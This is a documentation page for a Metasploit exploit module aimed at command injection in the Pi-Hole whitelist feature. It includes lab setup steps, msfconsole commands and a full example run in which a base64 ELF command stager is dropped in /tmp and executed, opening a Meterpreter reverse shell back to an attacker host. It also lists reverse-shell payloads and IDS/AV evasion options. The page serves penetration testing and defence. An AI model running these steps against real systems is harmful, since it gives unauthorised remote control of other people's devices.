Pi-Hole Whitelist OS Command Execution - Metasploit
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Module Overview
Name: Pi-Hole Whitelist OS Command Execution
Module: exploit/unix/http/pihole_whitelist_exec
Source code: modules/exploits/unix/http/pihole_whitelist_exec.rb
Disclosure date: 2018-04-15
Last modification time: 2022-10-03 19:50:04 +0000
Supported architecture(s): x86, x64, cmd
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -
This exploits a command execution vulnerability in Pi-Hole <= 3.3. When adding a new domain to the whitelist, it is possible to chain a command to the domain that is run on the OS.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/unix/http/pihole_whitelist_exec
msf exploit(pihole_whitelist_exec) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This exploits a command execution vulnerability in Pi-Hole <= 3.3. When adding a new domain to the whitelist, it is possible to chain a command to the domain that is run on the OS.
Setup
Install Pi-Hole Pi-Hole 3.2.1 with the following commands:
sudo git clone --depth=1 -b v3.2.1 https://github.com/pi-hole/pi-hole.git /etc/.pihole
# replace 'git clone' with 'git clone -b v3.2.1'
sudo nano /etc/.pihole/automated\ install/basic-install.sh
sudo /etc/.pihole/automated\ install/basic-install.sh
Pi-Hole attempts to install the latest versions of the software. Modifying the git clone command will force it to install the old AdminLTE and Pi-Hole versions. However this will make FTL fail to install.
Answer everything with the default.
Lastly, we need to create one file which wasn't made.
sudo touch /etc/pihole/GitHubVersions
This will be enough to make it exploitable, however the dashboard won't fully work since some other components were installed which are too new for it to work with.
If you wish to install FTL, follow the directions.
However, when cloning the FTL repo, add the flag -b v2.13.1
to pull an age appropriate version.
Also, the service may not install correctly. However simply running sudo /usr/bin/pihole-FTL
will start it successfully.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/unix/http/pihole_whitelist_exec
- Do:
set rhosts
- Do:
run
- You should get a shell.
Options
Password
Password for the web interface. Randomly set on install. Use pihole -a -p
to change/remove it.
Scenarios
Pi-Hole 3.2.1 with AdminLTE 3.2.1 on Ubuntu 18.04
msf5 > use exploit/unix/http/pihole_whitelist_exec
msf5 exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 exploit(unix/http/pihole_whitelist_exec) > set verbose true
verbose => true
msf5 exploit(unix/http/pihole_whitelist_exec) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[+] Version Detected: 3.2.1
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgCgGgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/DaQVx.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/QUFVT' < '/tmp/DaQVx.b64' ; chmod +x '/tmp/QUFVT' ; '/tmp/QUFVT' ; rm -f '/tmp/QUFVT' ; rm -f '/tmp/DaQVx.b64'"]
[*] Using cookie: PHPSESSID=j8o7g4m3e30279850hi275mqhk;
[*] Using token: OoSESvgJJEWq7mvYBEOJaa/6jyA0GRy56pRZvy93IlU=
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:44212) at 2020-05-13 23:25:19 -0400
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > getuid
Server username: no-user @ ubuntu1804 (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer : 2.2.2.2
OS : Ubuntu 18.04 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
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Msfconsole Usage
Here is how the unix/http/pihole_whitelist_exec exploit module looks in the msfconsole:
msf6 > use exploit/unix/http/pihole_whitelist_exec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(unix/http/pihole_whitelist_exec) > show info
Name: Pi-Hole Whitelist OS Command Execution
Module: exploit/unix/http/pihole_whitelist_exec
Platform: Linux
Arch: x86, x64, cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2018-04-15
Provided by:
h00die
Denis Andzakovic
Module side effects:
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Automatic Target
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Password for Pi-Hole interface
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the Pi-Hole Website
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Description:
This exploits a command execution vulnerability in Pi-Hole <= 3.3.
When adding a new domain to the whitelist, it is possible to chain a
command to the domain that is run on the OS.
References:
https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns
Module Options
This is a complete list of options available in the unix/http/pihole_whitelist_exec exploit:
msf6 exploit(unix/http/pihole_whitelist_exec) > show options
Module options (exploit/unix/http/pihole_whitelist_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Password for Pi-Hole interface
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the Pi-Hole Website
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
Advanced Options
Here is a complete list of advanced options supported by the unix/http/pihole_whitelist_exec exploit:
msf6 exploit(unix/http/pihole_whitelist_exec) > show advanced
Module advanced options (exploit/unix/http/pihole_whitelist_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_i
nvokewebrequest)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
ListenerComm no The specific communication channel to use for this service
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugLevel 0 yes Set debug level for meterpreter 0-3 (Default output is strerr)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in its own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
RemoteMeterpreterDebugFile no Redirect Debug Info to a Log File
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/http/pihole_whitelist_exec module can exploit:
msf6 exploit(unix/http/pihole_whitelist_exec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Target
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/http/pihole_whitelist_exec exploit:
msf6 exploit(unix/http/pihole_whitelist_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/linux/x64/exec normal No Linux Execute Command
6 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
7 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
8 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
9 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
10 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
11 payload/linux/x64/pingback_bind_tcp normal No Linux x64 Pingback, Bind TCP Inline
12 payload/linux/x64/pingback_reverse_tcp normal No Linux x64 Pingback, Reverse TCP Inline
13 payload/linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
14 payload/linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
15 payload/linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
16 payload/linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
17 payload/linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
18 payload/linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
19 payload/linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
20 payload/linux/x86/chmod normal No Linux Chmod
21 payload/linux/x86/exec normal No Linux Execute Command
22 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
23 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
24 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
25 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
26 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
27 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
28 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
29 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
30 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
31 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
32 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
33 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
34 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
35 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
36 payload/linux/x86/read_file normal No Linux Read File
37 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
38 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
39 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
40 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
41 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
42 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
43 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
44 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
45 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
46 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
47 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
48 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
49 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
50 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
Evasion Options
Here is the full list of possible evasion options supported by the unix/http/pihole_whitelist_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/http/pihole_whitelist_exec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
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Error Messages
This module may fail with the following error messages:
- Incorrect Password
- Unable to find token
- <PEER> - Could not connect to web service - no response
- <PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>
- Version Detected: <VERSION>
- <PEER> - Could not connect to the web service
- Target is not vulnerable
- <PEER> - Could not connect to the web service
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Incorrect Password
Here is a relevant code snippet related to the "Incorrect Password" error message:
87: if res && res.body.include?('Sign in to start your session')
88: res = login(cookie)
89: end
90:
91: if res && res.body.include?('Sign in to start your session')
92: fail_with(Failure::BadConfig, 'Incorrect Password')
93: end
94:
95: # <div id="token" hidden>f5al5pNfFj9YOCSdX159tXjttdHUOAuxOJDgwcgnUHs=</div>
96: # may also include /
97: %r{div id="token" hidden>(?<token>[\w+=/]+)</div>} =~ res.body
Unable to find token
Here is a relevant code snippet related to the "Unable to find token" error message:
95: # <div id="token" hidden>f5al5pNfFj9YOCSdX159tXjttdHUOAuxOJDgwcgnUHs=</div>
96: # may also include /
97: %r{div id="token" hidden>(?<token>[\w+=/]+)</div>} =~ res.body
98:
99: unless token
100: fail_with(Failure::UnexpectedReply, 'Unable to find token')
101: end
102:
103: print_status("Using token: #{token}")
104:
105: send_request_cgi({
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
119: begin
120: res = send_request_cgi(
121: 'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
122: 'method' => 'GET'
123: )
124: fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
125: fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
126:
127: # vDev (HEAD, v3.2.1-0-g31dddd8-dirty)
128: # v3.2.1
129: # rubocop:disable Lint/MixedRegexpCaptureTypes
<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>
Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:
120: res = send_request_cgi(
121: 'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
122: 'method' => 'GET'
123: )
124: fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
125: fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
126:
127: # vDev (HEAD, v3.2.1-0-g31dddd8-dirty)
128: # v3.2.1
129: # rubocop:disable Lint/MixedRegexpCaptureTypes
130: %r{<b>Web Interface Version\s*</b>\s*(vDev \(HEAD, )?v?(?<version>[\d.]+)\)?.*<b>}m =~ res.body
Version Detected: <VERSION>
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132:
133: if version && Rex::Version.new(version) < Rex::Version.new('3.3')
134: vprint_good("Version Detected: #{version}")
135: return CheckCode::Appears
136: else
137: vprint_bad("Version Detected: #{version}")
138: return CheckCode::Safe
139: end
140: rescue ::Rex::ConnectionError
141: fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
142: end
<PEER> - Could not connect to the web service
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136: else
137: vprint_bad("Version Detected: #{version}")
138: return CheckCode::Safe
139: end
140: rescue ::Rex::ConnectionError
141: fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
142: end
143: CheckCode::Safe
144: end
145:
146: def exploit
Target is not vulnerable
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143: CheckCode::Safe
144: end
145:
146: def exploit
147: if check != CheckCode::Appears
148: fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
149: end
150:
151: begin
152: execute_cmdstager(flavor: :bourne)
153: rescue ::Rex::ConnectionError
<PEER> - Could not connect to the web service
Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:
147: if check != CheckCode::Appears
148: fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
149: end
150:
151: begin
152: execute_cmdstager(flavor: :bourne)
153: rescue ::Rex::ConnectionError
154: fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
155: end
156: end
157: end
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Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14769 Merged Pull Request: Handle nil versions in preparation for rubygems 4
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13455 Merged Pull Request: Pi-Hole < 3.3 whitelist RCE
References
See Also
Check also the following modules related to this module:
- exploit/unix/http/pihole_blocklist_exec
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- exploit/unix/http/pfsense_diag_routes_webshell
- exploit/unix/http/pfsense_graph_injection_exec
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- exploit/unix/http/pfsense_pfblockerng_webshell
- exploit/unix/http/quest_kace_systems_management_rce
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- exploit/unix/http/tnftp_savefile
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- exploit/unix/http/vmturbo_vmtadmin_exec_noauth
- exploit/unix/http/xdebug_unauth_exec
- exploit/unix/http/zivif_ipcheck_exec
- auxiliary/admin/http/pihole_domains_api_exec
- exploit/linux/local/pihole_remove_commands_lpe
Authors
- h00die
- Denis Andzakovic
Version
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